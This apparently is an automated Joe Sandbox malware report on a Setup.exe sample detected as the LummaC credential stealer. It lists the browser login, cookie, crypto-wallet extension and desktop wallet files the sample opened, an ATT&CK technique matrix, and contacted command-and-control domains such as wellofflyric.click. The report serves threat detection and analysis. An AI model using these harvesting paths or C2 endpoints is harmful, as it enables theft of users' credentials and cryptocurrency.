Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Setup.exe

File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2050988322.00000000005B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2029575084.00000000005B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2080291766.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Setup.exe PID: 6996, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Setup.exe PID: 6996, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Access Token Manipulation	1 DLL Side-Loading	Security Account Manager	11 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	1 Process Injection	11 Virtualization/Sandbox Evasion	NTDS	36 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Access Token Manipulation	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Process Injection	Cached Domain Credentials	121 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	11 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Setup.exe	13%	Virustotal		Browse
Setup.exe	16%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://wellofflyric.click/api	0%	Avira URL Cloud	safe
wellofflyric.click	0%	Avira URL Cloud	safe
https://wellofflyric.click/apius.wal	0%	Avira URL Cloud	safe
https://wellofflyric.click/	0%	Avira URL Cloud	safe
https://wellofflyric.click/_	0%	Avira URL Cloud	safe
https://wellofflyric.click:443/api	0%	Avira URL Cloud	safe
https://wellofflyric.click/S	0%	Avira URL Cloud	safe
https://wellofflyric.click/?R	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wellofflyric.click	188.114.96.6	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
wordyfindy.lat	false		high
curverpluch.lat	false		high
slipperyloo.lat	false		high
tentabatte.lat	false		high
manyrestro.lat	false		high
shapestickyr.lat	false		high
https://wellofflyric.click/api	true	Avira URL Cloud: safe	unknown
talkynicer.lat	false		high
bashfulacid.lat	false		high
wellofflyric.click	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.innosetup.com/	Setup.exe	false		high
https://duckduckgo.com/chrome_newtab	Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wellofflyric.click/apius.wal	Setup.exe, 00000000.00000003.2050988322.00000000005B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2080291766.00000000005AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	Setup.exe	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	Setup.exe	false		high
http://ocsp.sectigo.com0	Setup.exe	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	Setup.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wellofflyric.click/	Setup.exe, 00000000.00000003.1983391322.0000000003CAB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Setup.exe, 00000000.00000003.1960340577.0000000003CF7000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1960134277.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1982435543.0000000003CF7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	Setup.exe	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Setup.exe, 00000000.00000003.1960340577.0000000003CF7000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1960134277.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1982435543.0000000003CF7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Setup.exe, 00000000.00000003.2005372626.0000000003DC7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wellofflyric.click/?R	Setup.exe, 00000000.00000003.2029575084.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2050988322.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2080291766.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	Setup.exe	false		high
http://www.remobjects.com/psU	Setup.exe	false		high
https://wellofflyric.click/_	Setup.exe, 00000000.00000003.1958884457.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959013995.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	Setup.exe	false		high
http://x1.c.lencr.org/0	Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	Setup.exe	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Setup.exe, 00000000.00000003.1960340577.0000000003CD2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	Setup.exe, 00000000.00000003.1960134277.0000000003D45000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.remobjects.com/ps	Setup.exe	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Setup.exe, 00000000.00000003.1960340577.0000000003CD2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	Setup.exe, 00000000.00000003.2005372626.0000000003DC7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wellofflyric.click/S	Setup.exe, 00000000.00000003.1983391322.0000000003CAB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wellofflyric.click:443/api	Setup.exe, 00000000.00000002.2080291766.0000000000549000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.6	wellofflyric.click	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580132
Start date and time:	2024-12-24 01:25:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
